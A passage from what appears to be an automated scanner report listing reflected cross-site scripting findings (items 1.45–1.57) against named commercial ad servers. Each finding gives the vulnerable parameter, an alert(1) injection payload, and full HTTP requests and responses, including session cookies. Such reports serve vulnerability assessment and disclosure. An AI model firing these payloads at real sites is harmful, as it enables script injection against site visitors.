Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 278
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:35:57 GMT
Expires: Mon, 14 Feb 2011 01:35:57 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/a;44306;0-0;0;46373374;39648-768/768;0/0/0;;~okv=;type=9eaaa';alert(1)//62bc3773dd1;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.45. http://ad.doubleclick.net/adj/wpni.politics/inlinead [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.politics/inlinead

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d2cc'-alert(1)-'80eb2a6b3f6 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/wpni.politics/inlinead;ad=5d2cc'-alert(1)-'80eb2a6b3f6 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 360
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:38:09 GMT
Expires: Mon, 14 Feb 2011 01:43:09 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/u;236054673;0-0;0;20580498;255-0/0;40598846/40616633/1;;~okv=;ad=5d2cc'-alert(1)-'80eb2a6b3f6;~aopt=2/0/a8/0;~sscs=%3fhttp://www.c-span.org/Series/Washington-Journal/">
...[SNIP]...

1.46. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdefb"-alert(1)-"6a122e04d38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserv/cs?tId=4071663510365101|cb=1297647330|adType=iframe|cId=3210|ec=1|spId=27355|advId=971|exId=19|price=0.3381000030040741|pubId=562|secId=194|invId=3099|notifyServer=asd147.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&fdefb"-alert(1)-"6a122e04d38=1 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://i.dailymail.co.uk/adTest/mpu-dm.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16043w0t012e301OdygJLiOt01jvdw3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv29fgs01y18010801215; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Set-Cookie: orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 14 Feb 2011 01:36:19 GMT
Content-Length: 830

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=4071663510365101|cId=3210|cb=1297647330|notifyPort=8080|exId=19|tId=4071
...[SNIP]...
br.net?anId=40&pubId=3099&advId=27355&campId=2946&vURL=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&fdefb"-alert(1)-"6a122e04d38=1";
</script>
...[SNIP]...

1.47. http://ad.media6degrees.com/adserv/cs [tId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The value of the tId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37aa2"-alert(1)-"5ae84f10ba7 was submitted in the tId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserv/cs?tId=4071663510365101|cb=1297647330|adType=iframe|cId=3210|ec=1|spId=27355|advId=971|exId=19|price=0.3381000030040741|pubId=562|secId=194|invId=3099|notifyServer=asd147.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html37aa2"-alert(1)-"5ae84f10ba7 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://i.dailymail.co.uk/adTest/mpu-dm.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16043w0t012e301OdygJLiOt01jvdp3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv29fgl01y18010801215; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Set-Cookie: orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 14 Feb 2011 01:36:12 GMT
Content-Length: 827

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=4071663510365101|cId=3210|cb=1297647330|notifyPort=8080|exId=19|tId=4071
...[SNIP]...
3br.net?anId=40&pubId=3099&advId=27355&campId=2946&vURL=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html37aa2"-alert(1)-"5ae84f10ba7";
</script>
...[SNIP]...

1.48. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f3c3"><script>alert(1)</script>10dcb1064b2 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4f3c3"><script>alert(1)</script>10dcb1064b2 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sat, 13-Aug-2011 01:34:03 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:34:03 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=2383879606519371855&fpid=4f3c3"><script>alert(1)</script>10dcb1064b2&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.49. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 32ead<script>alert(1)</script>edf430560af was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549&pid=190076932ead<script>alert(1)</script>edf430560af&ps=-1&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:02 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "190076932ead<script>alert(1)</script>edf430560af"

   
                                                           </head>
...[SNIP]...

1.50. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload aa72b--><script>alert(1)</script>56c01c56ac8 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549aa72b--><script>alert(1)</script>56c01c56ac8&pid=1900769&ps=-1&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:00 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3234


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1483549aa72b--><script>alert(1)</script>56c01c56ac8" -->
...[SNIP]...

1.51. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 98ad8--><script>alert(1)</script>818648b6a was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549&pid=1900769&ps=-198ad8--><script>alert(1)</script>818648b6a&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:05 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3667


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-198ad8--><script>alert(1)</script>818648b6a" -->
       <
...[SNIP]...

1.52. http://ads.adxpose.com/ads/ads.js [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 3feb5<script>alert(1)</script>2e70b7c5226 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=YpffvxtzOKuYhLCm_405295693feb5<script>alert(1)</script>2e70b7c5226 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0D346790CFB88D71D4593A30AB7CE8C9; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:37:09 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_YpffvxtzOKuYhLCm_405295693feb5<script>alert(1)</script>2e70b7c5226".replace(/[^\w\d]/g,""),"YpffvxtzOKuYhLCm_405295693feb5<script>
...[SNIP]...

1.53. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ea33"-alert(1)-"3b4b2d0d84c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1570312&9ea33"-alert(1)-"3b4b2d0d84c=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?.s1hAPQwCgD01TAAAAAAAK2gDQAAAAAAAgAQAAIAAAAAAP8AAAABFWJSEwAAAAAAY04TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACWOwUAAAAAAAIAAgAAAAAAmpmZmZmZ8T-amZmZmZnxP5qZmZmZmfE.mpmZmZmZ8T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADacgV4OXmhCUlS6anFfIVdJbtK4S9KioraJLUCAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D300x250%26s%3D667892%26r%3D1%26_salt%3D1162597115%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F,f4e74ee2-37e2-11e0-a10f-001b24783b3e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:34:56 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 14 Feb 2011 02:34:56 GMT
Pragma: no-cache
Content-Length: 4648
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?9ea33"-alert(1)-"3b4b2d0d84c=1&Z=300x250&s=1570312&_salt=2802567516";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A
...[SNIP]...

1.54. http://ads.specificmedia.com/serve/v=5 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b714e'-alert(1)-'2181d872488 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/v=5;m=2;l=5434;cxt=99002376:2166629-99002135:2165456-99013532:2161575;kw=;ts=187841;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0b714e'-alert(1)-'2181d872488 HTTP/1.1
Host: ads.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0502717091279373&output=html&h=250&slotname=5334629240&w=300&lmt=1297666157&flash=10.2.154&url=http%3A%2F%2Fwww.drudgereport.com%2F&dt=1297647258512&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647258544&frm=0&adk=473711736&ga_vid=1491658047.1297647259&ga_sid=1297647259&ga_hid=1857945157&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&eid=30143103&fu=0&ifi=1&dtd=95&xpc=y4g04mCIiz&p=http%3A//www.drudgereport.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5008.928757113086138685

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:33:44 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5007.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 19-Jan-2016 01:33:44 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 386
Expires: Sun, 13 Feb 2011 01:33:44 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<iframe src="http://ads.specificmedia.com/serve/v=5;m=3;l=5434;c=124229;b=785339;ts=20110213203344;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0b714e'-alert(1)-'2181d872488;cxt=99002376:2166629-99002135:2165456-99013532:2161575" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

1.55. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc57b'-alert(1)-'40972d271a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/v=5;m=2;l=5434;cxt=99002376:2166629-99002135:2165456-99013532:2161575;kw=;ts=187841;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0&bc57b'-alert(1)-'40972d271a2=1 HTTP/1.1
Host: ads.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0502717091279373&output=html&h=250&slotname=5334629240&w=300&lmt=1297666157&flash=10.2.154&url=http%3A%2F%2Fwww.drudgereport.com%2F&dt=1297647258512&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647258544&frm=0&adk=473711736&ga_vid=1491658047.1297647259&ga_sid=1297647259&ga_hid=1857945157&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&eid=30143103&fu=0&ifi=1&dtd=95&xpc=y4g04mCIiz&p=http%3A//www.drudgereport.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5008.928757113086138685

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:33:44 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5007.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 19-Jan-2016 01:33:45 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 389
Expires: Sun, 13 Feb 2011 01:33:45 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<iframe src="http://ads.specificmedia.com/serve/v=5;m=3;l=5434;c=124229;b=785339;ts=20110213203344;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0&bc57b'-alert(1)-'40972d271a2=1;cxt=99002376:2166629-99002135:2165456-99013532:2161575" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

1.56. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The value of the AdId request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload ab782><script>alert(1)</script>6e76889d9da was submitted in the AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blankab782><script>alert(1)</script>6e76889d9da HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 321

<html><body><base target=_blankab782><script>alert(1)</script>6e76889d9da><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7
...[SNIP]...

1.57. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

